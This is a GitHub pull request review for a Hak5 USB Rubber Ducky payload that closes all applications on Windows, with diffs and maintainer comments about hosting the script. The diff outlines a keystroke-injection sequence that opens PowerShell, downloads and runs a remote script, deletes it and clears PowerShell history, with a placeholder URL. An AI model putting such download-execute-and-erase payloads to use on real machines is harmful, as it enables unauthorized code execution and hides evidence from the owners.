### PR TITLE
Close All Applications In Windows - Plug And Play

### PR DESCRIPTION
**Pull request by aleff-github**

### CODE REVIEW

**Comment by aleff-github** [comment]
> Probably won't get this one accepted @aleff-github as it's calling on a python script from another repo, probably best to include the python script with the payload and let the user self host.

Thanks for the reply, how can I do this while meeting the standards of Hak5?
Should i put the script in the payload as a REM comment?
Or exist some better manner?

**Comment by dallaswinger** [comment]
@aleff-github by including it as a file in the same directory as your payload.txt

**Comment by aleff-github** [comment]
@dallaswinger file uploaded and links changed. Probably when you will accept it (if you decide to accept it) the link must be changed with the new one.

File: payloads/library/execution/CloseAllApplicationsInWindows/payload.txt [hunk 1]
```diff
@@ -0,0 +1,43 @@
...
+
+REM 
+REM 1. Open a powershell
+REM 2. Download a Python script
+REM 3. Execute it
+REM 4. Remove Python script downloaded
+REM 5. Delete powershell history
+REM
+
+DEFINE POWERSHEL_CODE bit.ly/Hak5_Powershel_Code
```
Comment (dallaswinger) [inline payloads/library/execution/CloseAllApplicationsInWindows/payload.txt:21]: do not use our github repo as a CDN by linking to your source here; see -
https://github.com/hak5/usbrubberducky-payloads#staged-payloads

**Comment by dallaswinger** [comment]
Appreciate you updating. Left my last requested change as a comment just now

**Comment by aleff-github** [comment]
> Appreciate you updating. Left my last requested change as a comment just now

I removed all redirection with comments that guide the user on what is the payload that should be used in the commit 3290dc9ae55c2a80c0e8dc2c604119d72cf5ae39
Please say me if this solutions can be right because in this case i will change all other Pull Request with the same problem.
Thanks for your assistance.

File: payloads/library/execution/CloseAllApplicationsInWindows/payload.txt [hunk 2]
```diff
@@ -0,0 +1,44 @@
...
+REM 
+REM 1. Open a powershell
+REM 2. Download a Python script
+REM 3. Execute it
+REM 4. Remove Python script downloaded
+REM 5. Delete powershell history
+REM
+
+REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
+DEFINE POWERSHEL_CODE YOUR_END_USER_LINK_WITH_PAYLOAD
```
Comment (dallaswinger) [inline payloads/library/execution/CloseAllApplicationsInWindows/payload.txt:22]: this is technically acceptable.

if you wanted to match the style guidelines **exactly** you would use 
`DEFINE POWERSHELL_CODE example.com` 

however your current code gets the job done just fine.

**Comment by dallaswinger** [comment]
awesome, tyvm!

**Pull request merged**